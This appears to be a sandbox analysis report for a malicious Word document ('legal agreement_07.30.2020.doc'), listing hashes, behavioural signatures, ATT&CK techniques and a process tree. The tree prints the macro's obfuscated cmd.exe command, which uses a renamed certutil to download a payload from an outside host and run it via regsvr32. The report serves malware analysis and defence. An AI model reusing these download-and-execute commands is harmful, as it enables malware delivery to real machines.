Overview

overview

10

Static

static

legal agre...20.doc

windows7_x64

10

legal agre...20.doc

windows10_x64

10

Analysis

  • max time kernel
    139s
  • max time network
    128s
  • platform
    windows10_x64
  • resource
    win10v200722
  • submitted
    31-07-2020 13:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    legal agreement_07.30.2020.doc

  • Size

    103KB

  • MD5

    b3b0dffa00f1a93dd4f4069d87f43dd3

  • SHA1

    756fe15d649645f5d9c3ef60dcd6d6ba5384633e

  • SHA256

    e67aa7a4192ca035c6c52a6afaf1b03058b9baa6fde616db3dad9d8d3d4c24cc

  • SHA512

    fe57b509a42cf017bc17d7b84d69ffb9c8de4e7240ef4056caf4e91fda39fee16b0019a4c6fba521f7278d99d857b9ef1374329177a70cc5b6ccc1bf44fd0202

Score
10/10

Malware Config

Signatures

  • Suspicious use of WriteProcessMemory 4 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious use of SetWindowsHookEx 19 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\legal agreement_07.30.2020.doc" /o ""
    1⤵
    • Suspicious use of WriteProcessMemory
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: AddClipboardFormatListener
    PID:3488
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c "set u=url&&call C:\ProgramData\1.exe /%u%^c^a^c^h^e^ /f^ http://bofzvaxf6.com/bolb/jaent.php?l=liut1.cab C:\ProgramData\1.tmp && call regsvr32 C:\ProgramData\1.tmp"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:2636
      • C:\ProgramData\1.exe
        C:\ProgramData\1.exe /urlcache /f http://bofzvaxf6.com/bolb/jaent.php?l=liut1.cab C:\ProgramData\1.tmp
        3⤵
        • Executes dropped EXE
        PID:2700

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads